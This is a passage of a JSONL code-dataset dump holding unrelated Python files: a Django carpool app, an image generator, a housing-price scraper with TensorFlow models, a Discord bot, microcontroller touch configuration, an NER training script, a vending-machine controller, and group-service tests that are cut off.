args[AddDashboardRequestParams.DASHBOARD_HTML] = self.dashboard_html\n args[AddDashboardRequestParams.IS_VENDOR_MAINTAINED] = self.is_vendor_maintained\n return args\n","sub_path":"APIs/dashboards/requests/add_dashboard.py","file_name":"add_dashboard.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"162354847","text":"from django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n url(r'^signup/$', views.signup, name='signup'),\n url(r'^$', views.index, name='index'),\n url(r'^login/$', views.login, name='login'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^offer_ride/$', views.offer_ride, name='offer_ride'), \n url(r'^join_ride/$', views.join_ride, name='join_ride'),\n]","sub_path":"smartpool/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"511565285","text":"import os\nimport threading\nfrom typing import List\n\nfrom PIL import Image\nimport random\nimport time\n\n\nclass make_wall:\n def __init__(self, numbers, filename, choice):\n numbers = numbers[::-1]\n cwd = os.getcwd()\n # print(\"Current working directory: {0}\".format(cwd))\n\n # print(numbers, filename, choice, wall_done)\n self.number_1_choice = numbers[0]\n self.number_2_choice = numbers[1]\n self.number_3_choice = numbers[2]\n self.wall = Image.new('RGB', (240, 650))\n self.path = \"birds_game_wall/\"\n self.file = filename\n self.choice = choice\n\n def put_numbers_on_wall(self, n, y_offset_n, x_offset_n):\n\n number_1 = [[0, 0, 1, 0], [0, 1, 1, 0], [0, 0, 1, 0], [0, 0, 1, 0], [0, 1, 1, 1]]\n number_2 = [[0, 1, 1, 0], [1, 0, 0, 1], [0, 0, 1, 0], [0, 1, 0, 0], [1, 1, 1, 1]]\n number_3 = [[0, 1, 1, 0], [1, 0, 0, 1], [0, 0, 1, 0], [1, 0, 0, 1], [0, 1, 1, 0]]\n number_4 = [[0, 0, 1, 1], [0, 1, 0, 1], [1, 1, 1, 1], [0, 0, 0, 1], [0, 0, 0, 1]]\n number_5 = [[1, 1, 1, 1], [1, 0, 0, 0], [1, 1, 1, 0], [0, 0, 0, 1], [1, 1, 1, 0]]\n number_6 = [[0, 1, 1, 1], [1, 0, 0, 0], [1, 1, 1, 0], [1, 0, 0, 1], [0, 1, 1, 0]]\n number_7 = [[1, 1, 1, 1], [0, 0, 0, 1], [0, 0, 1, 0], [0, 0, 1, 0], [0, 0, 1, 0]]\n number_8 = [[0, 1, 1, 0], [1, 0, 0, 1], [0, 1, 1, 0], [1, 0, 0, 1], [0, 1, 1, 0]]\n number_9 = [[0, 1, 1, 0], [1, 0, 0, 1], [0, 1, 1, 1], [0, 0, 0, 1], [0, 0, 0, 1]]\n number_0 = [[0, 1, 1, 0], [1, 0, 0, 1], [1, 0, 0, 1], [1, 0, 0, 1], [0, 1, 1, 0]]\n\n numbers = [int(i) if i != '-' else \"-\" for i in str(n)]\n original_y = y_offset_n\n\n for number in numbers:\n original_x = x_offset_n\n y_offset_n = original_y\n if number == 0:\n choice = number_0\n elif number == 1:\n choice = number_1\n elif number == 2:\n choice = number_2\n elif number == 3:\n choice = number_3\n elif number == 4:\n choice = number_4\n elif number == 5:\n choice = number_5\n elif number == 6:\n choice = number_6\n elif number == 7:\n choice = number_7\n elif number == 8:\n choice = number_8\n elif number == 9:\n choice = number_9\n\n y = 0\n x = 0\n image_numbers = Image.open(self.path + 'brick_wall_letter.png')\n if number == '-':\n # handle negative\n self.wall.paste(image_numbers, (x_offset_n - 20, y_offset_n + 50))\n self.wall.paste(image_numbers, (x_offset_n - 20 - 10, y_offset_n + 50))\n continue\n\n while True:\n if choice[y][x] == 1:\n self.wall.paste(image_numbers, (x_offset_n, y_offset_n))\n x_offset_n += image_numbers.size[0]\n x += 1\n if x == 4:\n x_offset_n = original_x\n y_offset_n += image_numbers.size[1]\n x = 0\n y += 1\n if y == 5:\n break\n\n x_offset_n += 60\n\n return y_offset_n\n\n def create_wall(self, callback = None):\n x_offset = 0\n y_offset = 0\n y_wall = Image.new('RGB', (12, 650))\n wall_chosen = random.choice(['brick_wall_plain.png', 'red_brick.png', 'brown_brick.png'])\n image = Image.open(self.path + wall_chosen)\n for _ in range(650 // 25):\n y_wall.paste(image, (x_offset, y_offset))\n y_offset += image.size[1]\n y_offset = 0\n for _ in 
range(20):\n self.wall.paste(y_wall, (x_offset, y_offset))\n x_offset += image.size[0]\n\n image_window = Image.open(self.path + 'basicWindow.png')\n self.wall.paste(image_window, (0, 50))\n self.wall.paste(image_window, (0, 250))\n self.wall.paste(image_window, (0, 450))\n\n self.wall.paste(image_window, (230, 50))\n self.wall.paste(image_window, (230, 250))\n self.wall.paste(image_window, (230, 450))\n numbers = [self.number_1_choice, self.number_2_choice, self.number_3_choice]\n y_offset_n = 62\n x_offset_n = 40\n for number in numbers:\n y_offset_n = self.put_numbers_on_wall(number, y_offset_n, x_offset_n)\n y_offset_n += 75\n\n self.wall.save(self.path + self.file)\n callback and callback()\n\n\nclass WallGeneratorWorker(threading.Thread):\n def __init__(self, threadID, name, filename: str, numbers: List[int], callback=lambda: None):\n # print(\"WallGeneratorWorker\")\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.filename = filename\n self.numbers = numbers\n self.callback = callback\n\n def run(self):\n # print(\"run\")\n choice = True\n try:\n start = make_wall(self.numbers, self.filename, choice)\n # start_time = time.time()\n start.create_wall()\n # print(\"----------%s Time it Took-------------\" % (time.time() - start_time))\n except Exception as e:\n print(\"error\")\n print(str(e))\n time.sleep(1)\n self.on_done()\n\n def on_done(self):\n self.callback and self.callback()\n\n\nif __name__ == \"__main__\":\n filename = 'current_wall1.png'\n choice = True\n\n\n def wall_done():\n print(\"Wall_Done\")\n\n\n start = make_wall([-888, 600, 150], filename, choice)\n start.path = \"\"\n start_time = time.time()\n start.create_wall()\n print(\"----------%s Time it Took-------------\" % (time.time() - start_time))\n","sub_path":"birds_game_wall/wall_generator.py","file_name":"wall_generator.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"635719201","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\nimport requests\nfrom lxml import etree\nimport re\nimport csv\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n\ndef get_house_info(urls, output_path):\n header = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'}\n data = []\n for url in urls:\n r = requests.get(url, headers=header)\n if r.status_code == 200:\n html = etree.HTML(r.text)\n all_info = html.xpath('//div[@class=\"info clear\"]')\n for info in all_info:\n # ' | 2室1厅 | 79平米 | 南 | 精装'\n houseInfo = info.xpath('div[@class=\"address\"]/div[@class=\"houseInfo\"]/text()')[0]\n positionInfo = info.xpath('div[@class=\"flood\"]/div[@class=\"positionInfo\"]/text()')[0]\n price = info.xpath('div[@class=\"priceInfo\"]/div[@class=\"totalPrice\"]/span/text()')[0]\n\n room_info = re.search(r'(\\d)室(\\d)厅', houseInfo)\n decorate = re.search(r'(精装|毛坯|简装)', houseInfo)\n area = re.search(r'(\\d+(?:.\\d+)*)平米', houseInfo)\n floor = re.search(r'(低|中|高)楼层', positionInfo)\n\n if not (room_info and room_info and decorate and area and floor):\n continue\n\n rooms = room_info.group(1)\n halls = room_info.group(2)\n decorate = {\"毛坯\": 0, \"简装\": 1, \"精装\": 2}[decorate.group(1)]\n area = area.group(1)\n floor = {\"低\": 0, \"中\": 1, \"高\": 2}[floor.group(1)]\n\n data.append([rooms, halls, decorate, area, floor, price])\n\n # 写入csv文件\n with open(output_path, \"w\", encoding='utf-8', 
newline='') as f:\n writer = csv.writer(f)\n # 写入列的名称\n writer.writerow([\"房间数\", \"客厅数\", \"装修(毛坯:0,简装:1,精装:2)\", \"面积\", \"楼层(低:0,中:1,高:2)\", \"总价\"])\n # 写入内容\n writer.writerows(data)\n\n\nsounth_urls = (\"https://cd.lianjia.com/ershoufang/c3011056655752/\",\n \"https://cd.lianjia.com/ershoufang/pg2c3011056655752/\",\n \"https://cd.lianjia.com/ershoufang/pg3c3011056655752/\",\n \"https://cd.lianjia.com/ershoufang/pg4c3011056655752/\")\nnorth_urls = (\"https://cd.lianjia.com/ershoufang/c3011056658392/\",\n \"https://cd.lianjia.com/ershoufang/pg2c3011056658392/\")\n\nget_house_info(sounth_urls, 'C:\\project\\python\\南区.csv')\nget_house_info(north_urls, 'C:\\project\\python\\北区.csv')\ndata = pd.read_csv('C:\\project\\python\\南区.csv')\ndata_test = pd.read_csv('C:\\project\\python\\北区.csv')\nplt.scatter(data['面积'], data['总价'])\nplt.show()\nx = data['面积']\ny = data['总价']\nmodel = tf.keras.Sequential()\nmodel.add(tf.keras.layers.Dense(1, input_shape=(1,)))\nmodel.summary()\nmodel.compile(optimizer='adam', loss='mse')\nhistory = model.fit(x, y, epochs=10000)\nmodel.predict(data_test.iloc[:10, -3])\nplt.plot(data['面积'], data['总价'], 'bo',\n data['面积'], model.predict(data.iloc[:, -3]), 'ro')\nplt.show()\nplt.plot(data_test['面积'], data_test['总价'], 'bo',\n data_test['面积'], model.predict(data_test.iloc[:, -3]), 'ro')\nplt.show()\n\n#\nx2 = data.iloc[:, 2:-1]\ny2 = data.iloc[:, -1]\n\nmodel2 = tf.keras.Sequential([\n tf.keras.layers.Dense(30, input_shape=(3,), activation='relu'),\n tf.keras.layers.Dense(30, input_shape=(3,), activation='relu'),\n tf.keras.layers.Dense(30, input_shape=(3,), activation='relu'),\n tf.keras.layers.Dense(30, input_shape=(3,), activation='relu'),\n tf.keras.layers.Dense(1)])\nmodel2.summary()\nmodel2.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),\n loss='mse')\nhistory2 = model2.fit(x2, y2, epochs=10000)\nmodel2.predict(data_test.iloc[:10, 2:-1])\nplt.plot(data['面积'], data['总价'], 'bo',\n data['面积'], model2.predict(data.iloc[:, 2:-1]), 'ro')\nplt.show()\nplt.plot(data_test['面积'], data_test['总价'], 'bo',\n data_test['面积'], model2.predict(data_test.iloc[:, 2:-1]), 'ro')\nplt.show()\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"581656930","text":"import discord\r\nimport os\r\nimport json\r\nimport random\r\nimport STATICS\r\nfrom discord import Game, Embed\r\nfrom commands import cmd_kiss, cmd_cuddle, cmd_help\r\n\r\n\r\nclient = discord.Client()\r\n\r\n\r\ncommands = {\r\n\r\n\t\"kiss\": cmd_kiss,\r\n\t\"cuddle\": cmd_cuddle,\r\n\t\"help\": cmd_help,\r\n\r\n}\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n\tprint(\"Bot is ready!\")\r\n\tprint(\"Logged in as\")\r\n\tprint(client.user.name)\r\n\tprint(\"with a UserID of\")\r\n\tprint(client.user.id)\r\n\tawait client.change_presence(game=discord.Game(name=\"Making Coffee! 
x3 (ck!)\"))\r\n\r\n\t\r\n\t\r\n@client.event\r\nasync def on_message(message):\r\n if message.content.startswith(STATICS.PREFIX):\r\n invoke = message.content[len(STATICS.PREFIX):].split(\" \")[0]\r\n args = message.content.split(\" \")[1:]\r\n if commands.__contains__(invoke):\r\n await commands.get(invoke).ex(args, message, client, invoke)\r\n else:\r\n await client.send_message(message.channel, embed=discord.Embed(color=discord.Color.red(), description=(\"The command `%s` is not valid!\" % invoke)))\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n\tif message.content.startswith(\"ck!headpat\"):\r\n\t\tawait client.send_message(message.channel, random.choice([\"Oh...\", \"Aww..\", \"I l-love it...\", \"P-Please continue doing that.\", \"T-Thanks.. It feels great...\"]))\r\n\telif message.content.startswith(\"abc\"):\r\n\t\tawait client.send_message(message.channel, \"def\")\r\n\telif message.content.startswith(\"ck!ask\"):\r\n\t\tawait client.send_message(message.channel, random.choice([\"Uh.. I t-think that would be a yes.\", \"I-I agree with that..\", \"Oh.. M-My answer would be a maybe. I-I'm not too sure..\", \"I-I approve with it..\", \"Y-Yes..\", \"I d-don't approve of it..\", \"No.. T-That's a no.\", \"N-No..\", \"I-I don't think so..\", \"My answer is a no..\"]))\r\n\telif message.content.startswith(\"ck!chino\"):\r\n\t\tawait client.send_file(message.channel, random.choice([\"pictures/chino1, pictures/chino2\"]))\r\nclient.run(str(os.environ.get(\"BOT_TOKEN\")))\r\n","sub_path":"Chino.py","file_name":"Chino.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"315563769","text":"############################################################################\n#### Code Generation ####\n############################################################################\nif (getDeviceName.getDefaultValue() in [\"SAME51\",\"SAME53\",\"SAME54\",\"SAMD51\"]):\n # Library File\n touchLibraryFile = qtouchComponent.createLibrarySymbol(\"TOUCH_KEY_LIB\", None)\n touchLibraryFile.setSourcePath(\"/src/libraries/0x0002_qtm_touch_key_cm4.X.a\")\n touchLibraryFile.setOutputName(\"0x0002_qtm_touch_key_cm4.X.a\")\n touchLibraryFile.setDestPath(\"/touch/lib/\")\n touchLibraryFile.setEnabled(True)\nelse:\n # Library File\n touchLibraryFile = qtouchComponent.createLibrarySymbol(\"TOUCH_KEY_LIB\", None)\n touchLibraryFile.setSourcePath(\"/src/libraries/0x0002_qtm_touch_key_cm0p.X.a\")\n touchLibraryFile.setOutputName(\"0x0002_qtm_touch_key_cm0p.X.a\")\n touchLibraryFile.setDestPath(\"/touch/lib/\")\n touchLibraryFile.setEnabled(True)\n\n# Header File\ntouchHeaderFile = qtouchComponent.createFileSymbol(\"TOUCH_KEY_HEADER\", None)\ntouchHeaderFile.setSourcePath(\"/src/qtm_touch_key_0x0002_api.h\")\ntouchHeaderFile.setOutputName(\"qtm_touch_key_0x0002_api.h\")\ntouchHeaderFile.setDestPath(\"/touch/\")\ntouchHeaderFile.setProjectPath(\"config/\" + configName + \"/touch/\")\ntouchHeaderFile.setType(\"HEADER\")\ntouchHeaderFile.setMarkup(False)\n\n################################################################################\n#### Global Variables ####\n################################################################################\ntouchKeyCountMax = touchChannelCountMax\n################################################################################\n#### Component ####\n################################################################################\nkeyMenu = 
qtouchComponent.createMenuSymbol(\"KEY_MENU\", touchMenu)\nkeyMenu.setLabel(\"Key Configuration\")\nkeyMenu.setDescription(\"Configure Keys\")\n\n# Touch Channel Enable Count\ntouchKeyNumChannel = qtouchComponent.createIntegerSymbol(\"TOUCH_KEY_ENABLE_CNT\", keyMenu)\ntouchKeyNumChannel.setLabel(\"Number of keys to enable\")\ntouchKeyNumChannel.setDefaultValue(0)\ntouchKeyNumChannel.setMin(0)\ntouchKeyNumChannel.setMax(touchKeyCountMax)\n\nfor channelID in range(0, touchKeyCountMax):\n\n touchKeyEnable = qtouchComponent.createBooleanSymbol(\"TOUCH_ENABLE_KEY_\" + str(channelID), keyMenu)\n touchKeyEnable.setLabel(\"Use touch channel \" + str(channelID))\n touchKeyEnable.setDefaultValue(False)\n\n #Sensor Detect Threshold\n touchSym_SENSOR_DET_THRESHOLD_Val = qtouchComponent.createIntegerSymbol(\"DEF_SENSOR_DET_THRESHOLD\" + str(channelID), touchKeyEnable)\n touchSym_SENSOR_DET_THRESHOLD_Val.setLabel(\"Sensor Detect Threshold\")\n touchSym_SENSOR_DET_THRESHOLD_Val.setDefaultValue(20)\n touchSym_SENSOR_DET_THRESHOLD_Val.setMin(0)\n touchSym_SENSOR_DET_THRESHOLD_Val.setMax(255)\n touchSym_SENSOR_DET_THRESHOLD_Val.setDescription(\"Configure the sensor's detect threshold. When finger touches sensor, the touch delta increases.Sensor will be reported as touched only if the sensor's touch delta value is more than Sensor Threshold.It is recommended to configure Sensor Threshold as 50~70% of touch delta. User can start with default value and can configure after monitoring touch delta value.\")\n \n #Sensor Hysteresis\n touchSym_SENSOR_HYST_Val = qtouchComponent.createKeyValueSetSymbol(\"DEF_SENSOR_HYST\" + str(channelID), touchKeyEnable)\n touchSym_SENSOR_HYST_Val.setLabel(\"Sensor Hysteresis\")\n touchSym_SENSOR_HYST_Val.addKey(\"HYST50\", \"HYST_50\", \"50 %\")\n touchSym_SENSOR_HYST_Val.addKey(\"HYST25\", \"HYST_25\", \"25 %\")\n touchSym_SENSOR_HYST_Val.addKey(\"HYST125\", \"HYST_12_5\", \"12.5 %\")\n touchSym_SENSOR_HYST_Val.addKey(\"HYST625\", \"HYST_6_25\", \"6.25 %\")\n touchSym_SENSOR_HYST_Val.setDefaultValue(1)\n touchSym_SENSOR_HYST_Val.setOutputMode(\"Value\")\n touchSym_SENSOR_HYST_Val.setDisplayMode(\"Description\")\n touchSym_SENSOR_HYST_Val.setDescription(\"Under noisy conditions, the delta value goes up/down over the sensor threshold.During these conditions, the sensor dither in and out of touch.To avoid this, once a sensor goes into detect state, the threshold for the sensor is reduced (by the hysteresis value).Hysteresis values are derived from Sensor Threshold value.\")\n \n #Sensor AKS Setting\n touchSym_NOD_AKS_Val = qtouchComponent.createKeyValueSetSymbol(\"DEF_NOD_AKS\" + str(channelID), touchKeyEnable)\n touchSym_NOD_AKS_Val.setLabel(\"Sensor AKS\")\n touchSym_NOD_AKS_Val.addKey(\"AKS0\", \"NO_AKS_GROUP\", \"No AKS\")\n touchSym_NOD_AKS_Val.addKey(\"AKS1\", \"AKS_GROUP_1\", \"AKS Group 1\")\n touchSym_NOD_AKS_Val.addKey(\"AKS2\", \"AKS_GROUP_2\", \"AKS Group 2\")\n touchSym_NOD_AKS_Val.addKey(\"AKS3\", \"AKS_GROUP_3\", \"AKS Group 3\")\n touchSym_NOD_AKS_Val.addKey(\"AKS4\", \"AKS_GROUP_4\", \"AKS Group 4\")\n touchSym_NOD_AKS_Val.addKey(\"AKS5\", \"AKS_GROUP_5\", \"AKS Group 5\")\n touchSym_NOD_AKS_Val.addKey(\"AKS6\", \"AKS_GROUP_6\", \"AKS Group 6\")\n touchSym_NOD_AKS_Val.addKey(\"AKS7\", \"AKS_GROUP_7\", \"AKS Group 7\")\n touchSym_NOD_AKS_Val.setDefaultValue(0)\n touchSym_NOD_AKS_Val.setOutputMode(\"Value\")\n touchSym_NOD_AKS_Val.setDisplayMode(\"Description\")\n touchSym_NOD_AKS_Val.setDescription(\"Configures the Adjacent Keys Suppression (AKS).AKS can be used when 
touching multiple sensors are not allowed in a system or When sensors are physically closer to each other. When sensors are closer to each other, there is a possibility that touching one sensor causes rise in touch delta value on other adjacent sensors. At times the delta raise in other sensors may cross threshold and could report false detection.When such sensors are configured in same AKS group, only the first sensor (which goes in to detect) will be reported as touched.All other sensor's state will be suppressed even if their delta crosses Sensor Threshold.Default: AKS is not used.\")\n\n\n\n","sub_path":"config/key.py","file_name":"key.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"338175092","text":"#!/usr/bin/env python\nimport numpy as np\nimport pickle\nimport random\nfrom random import shuffle\nfrom training.util import adjust_learning_rate, clip_model_grad, create_opt, load_dynamic_config\nfrom util.evaluate import evaluate, count_overlap, evaluate_detail\nfrom model.SemiMention import SemiMention\nfrom config import config\nfrom torch.autograd import Variable\nimport torch\nimport copy\nimport time\nimport pdb\n\n# load data\nf = open(config.data_path + \"_train.pkl\", 'rb')\ntrain_token_batches, train_char_batch, train_char_len_batch, train_pos_batches, train_label_batches = pickle.load(f)\nf.close()\nf = open(config.data_path + \"_dev.pkl\", 'rb')\ndev_token_batches, dev_char_batch, dev_char_len_batch, dev_pos_batches, dev_label_batches = pickle.load(f)\nf.close()\nf = open(config.data_path + \"_test.pkl\", 'rb')\ntest_token_batches, test_char_batch, test_char_len_batch, test_pos_batches, test_label_batches = pickle.load(f)\nf.close()\n\n# misc info \n# TODO: get it better\nmisc_config = pickle.load(open(config.data_path + \"_config.pkl\", 'rb'))\nload_dynamic_config(misc_config, config)\nid2label = misc_config[\"id2label\"]\n\nner_model = SemiMention(config)\nif config.pre_trained:\n ner_model.load_vector()\nif config.if_gpu and torch.cuda.is_available(): ner_model = ner_model.cuda()\n\nparameters = filter(lambda p: p.requires_grad, ner_model.parameters())\noptimizer = create_opt(parameters, config)\n\nprint(\"{0} batches expected for training\".format(len(train_token_batches)))\nbest_model = None\nbest_per = 0\ntrain_all_batches = list(zip(train_token_batches, train_char_batch, train_char_len_batch, train_pos_batches, train_label_batches))\nif config.if_shuffle:\n shuffle(train_all_batches)\n\n\ndef get_f1(model, mode):\n pred_all, pred, recall_all, recall = 0, 0, 0, 0\n f_pred_all, f_pred, f_recall_all, f_recall = 0, 0, 0, 0\n gold_cross_num = 0\n pred_cross_num = 0\n if mode == \"dev\":\n batch_zip = zip(dev_token_batches, dev_char_batch, dev_char_len_batch, dev_pos_batches, dev_label_batches)\n elif mode == \"test\":\n batch_zip = zip(test_token_batches, test_char_batch, test_char_len_batch, test_pos_batches, test_label_batches)\n else:\n raise ValueError\n\n for token_batch, char_batch, char_len_batch, pos_batch, label_batch in batch_zip:\n token_batch_var = Variable(torch.LongTensor(np.array(token_batch)))\n pos_batch_var = Variable(torch.LongTensor(np.array(pos_batch)))\n if config.if_gpu:\n token_batch_var = token_batch_var.cuda()\n pos_batch_var = pos_batch_var.cuda()\n\n model.eval()\n pred_entities = model.predict(token_batch_var, pos_batch_var)\n p_a, p, r_a, r = evaluate(label_batch, pred_entities)\n\n #gold_cross_num += sum(count_overlap(label_batch))\n 
#pred_cross_num += sum(count_overlap(pred_entities))\n gold_cross_num += 0\n pred_cross_num += 0\n\n pred_all += p_a\n pred += p\n recall_all += r_a\n recall += r\n\n\n print(pred_all, pred, recall_all, recall)\n p = pred / pred_all if pred_all else 0\n r = recall / recall_all if recall_all else 0\n f1 = 2 * p * r / (p + r) if p + r else 0\n # f1 = 2 / ((pred_all / pred) + (recall_all / recall))\n print( \"Precision {0}, Recall {1}, F1 {2}\".format(pred / pred_all, recall / recall_all, f1) )\n # print(\"Prediction Crossing: \", pred_cross_num)\n # print(\"Gold Crossing: \", gold_cross_num)\n\n return f1\n\n# Test\n# f1 = get_f1(ner_model, \"dev\")\n\ntrain_start_time = time.time()\nearly_counter = 0\ndecay_counter = 0\nfor e_ in range(config.epoch):\n print(\"Epoch: \", e_ + 1)\n batch_counter = 0\n for token_batch, char_batch, char_len_batch, pos_batch, label_batch in train_all_batches:\n batch_len = len(token_batch)\n sent_len = len(token_batch[0])\n\n token_batch_var = Variable(torch.LongTensor(np.array(token_batch)))\n pos_batch_var = Variable(torch.LongTensor(np.array(pos_batch)))\n if config.if_gpu:\n token_batch_var = token_batch_var.cuda()\n pos_batch_var = pos_batch_var.cuda()\n\n ner_model.train()\n optimizer.zero_grad()\n loss = ner_model.forward(token_batch_var, pos_batch_var, label_batch)\n loss.backward()\n clip_model_grad(ner_model, config.clip_norm)\n if batch_counter % config.print_per_epoch == 0:\n print(\"batch {0} with {1} instance and sentece length {2} loss {3}\".format(\n batch_counter, batch_len, sent_len, loss.cpu().data.numpy()[0]))\n batch_counter += 1\n\n optimizer.step()\n\n if (e_+1) % config.check_every != 0:\n continue\n\n # evaluating dev and always save the best\n cur_time = time.time()\n f1 = get_f1(ner_model, \"dev\")\n print(\"Dev step took {} seconds\".format(time.time() - cur_time))\n\n # early stop\n if f1 > best_per:\n early_counter = 0\n best_per = f1\n del best_model\n best_model = copy.deepcopy(ner_model)\n else:\n early_counter += 1\n if early_counter > config.lr_patience:\n decay_counter += 1\n early_counter = 0\n if decay_counter > config.decay_patience:\n break\n else:\n adjust_learning_rate(optimizer)\nprint(\"\")\nprint(\"Training step took {} seconds\".format(time.time() - train_start_time))\nprint(\"Best dev acc {0}\".format(best_per))\nprint(\"\")\n\n# remember to eval after loading the model. 
for the reason of batchnorm and dropout\ncur_time = time.time()\nprint(\"Metric on test dataset of best model:\")\nf1 = get_f1(best_model, \"test\")\nprint(\"Test step took {} seconds\".format(time.time() - cur_time))\n\nserial_number = str(random.randint(0,248))\nthis_model_path = config.model_path + \"_\" + serial_number\nprint(\"Dumping model to {0}\".format(this_model_path))\ntorch.save(best_model.state_dict(), this_model_path)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"573635894","text":"from parser import Parser\nimport queue\nimport time\nimport math\nimport os\nimport socket\nfrom gui.client import Client\nfrom gui.guilistener import GuiListener\nfrom coffe_machine import PiHatListener\nfrom config import DRINK_IDS\nfrom config import DRINK_UUIDS\n\nif __name__ == \"__main__\":\n start_time = 0\n\n dataQueue = queue.PriorityQueue()\n listener = GuiListener(port = 65448, dataQueue = dataQueue)\n listener.setDaemon(True)\n listener.start()\n\n while True:\n try:\n c = Client('127.0.0.1', 65449)\n break\n except:\n pass\n print('Connecting')\n time.sleep(1)\n\n\n parser = Parser(dataQueue = dataQueue)\n parser.setDaemon(True)\n parser.start()\n\n\n ph1 = PiHatListener(dataQueue = dataQueue)\n ph1.setDaemon(True)\n ph1.start()\n ph1.subscribeToVMC()\n\n waiting_transaction = False\n current_address = 2020202\n \n while True:\n msg = dataQueue.get().data\n\n if 'subscribed' in msg.keys():\n if msg['subscribed'] == True:\n c.sendMessage('mainScreen')\n ph1.subscribed = True\n\n\n if 'UUID' in msg.keys() and parser.empty == False:\n choice = None\n for k,v in DRINK_UUIDS.items():\n tmp = v.replace('-', '').upper()\n print(tmp, msg['UUID']['uuid'])\n if tmp == msg['UUID']['uuid'].replace(' ', ''):\n choice = k\n ph1.startVending()\n time.sleep(1)\n ph1.selectBeverage(choice)\n\n \n if 'gui' in msg.keys():\n if msg['gui'] == 'startVend':\n c.sendMessage('syncScreen')\n\n if 'id' in msg.keys():\n choice = None\n for k, v in DRINK_IDS.items():\n print(v, msg['id'])\n if k == msg['id']:\n choice = k\n amount = v\n print(choice)\n current_address = str(current_address)\n c.sendMessage('paymentScreen-' + current_address + '-' + str(amount) + '-' + choice)\n start_time = time.time()\n waiting_transaction = True\n\n if 'paid' in msg.keys():\n if msg['paid'] == True: \n c.sendMessage('finalScreen')\n ph1.subscribeToVMC()\n time.sleep(3)\n waiting_transaction = False\n start_time = 0\n parser.empty = True\n\n time.sleep(1)\n","sub_path":"ibeacon_project/tmp_vend.py","file_name":"tmp_vend.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"326177733","text":"import gbe.models as conf\nfrom django.http import Http404\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.models import User, Group\nfrom django.conf import settings\n\ndef validate_profile(request, require=False):\n '''\n Return the user profile if any\n '''\n if request.user.is_authenticated():\n try:\n return request.user.profile\n except conf.Profile.DoesNotExist:\n if require:\n raise Http404\n else:\n return None\n\n\ndef validate_perms(request, perms, require = True):\n '''\n Validate that the requesting user has the stated permissions\n Returns profile object if perms exist, False if not\n '''\n profile = validate_profile(request, require = False)\n if not profile:\n if 
require:\n raise Http404\n else:\n return False\n if any([perm in profile.privilege_groups for perm in perms]):\n return profile\n if require: # error out if permission is required\n raise Http404\n return False # or just return false if we're just checking\n\n\n'''\n Sends mail to a privilege group, designed for use by bid functions\n Will always send using default_from_email \n'''\ndef mail_to_group(subject, message, group_name):\n to_list = [user.email for user in User.objects.filter(groups__name=group_name)]\n send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, to_list)\n return None\n","sub_path":"expo/gbe/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"83756394","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport mock\nimport pytest\n\nfrom h.models import Group, GroupScope\nfrom h.models.group import JoinableBy, ReadableBy, WriteableBy\nfrom h.services.group import GroupService\nfrom h.services.group import groups_factory\n\nfrom tests.common.matchers import Matcher\n\n\nclass TestGroupService(object):\n def test_create_private_group_returns_group(self, service):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert isinstance(group, Group)\n\n def test_create_private_group_sets_group_name(self, service):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert group.name == 'Anteater fans'\n\n def test_create_private_group_sets_group_authority(self, service):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert group.authority == 'example.com'\n\n def test_create_private_group_sets_group_creator(self, service, users):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert group.creator == users['cazimir']\n\n def test_create_private_group_sets_description_when_present(self, service):\n group = service.create_private_group('Anteater fans', 'cazimir', 'all about ant eaters')\n\n assert group.description == 'all about ant eaters'\n\n def test_create_private_group_skips_setting_description_when_missing(self, service):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert group.description is None\n\n def test_create_private_group_adds_group_creator_to_members(self, service, users):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert users['cazimir'] in group.members\n\n @pytest.mark.parametrize('flag,expected_value', [\n ('joinable_by', JoinableBy.authority),\n ('readable_by', ReadableBy.members),\n ('writeable_by', WriteableBy.members)])\n def test_create_private_group_sets_access_flags(self, service, flag, expected_value):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert getattr(group, flag) == expected_value\n\n def test_create_private_group_adds_group_to_session(self, db_session, service):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert group in db_session\n\n def test_create_private_group_sets_group_ids(self, service):\n group = service.create_private_group('Anteater fans', 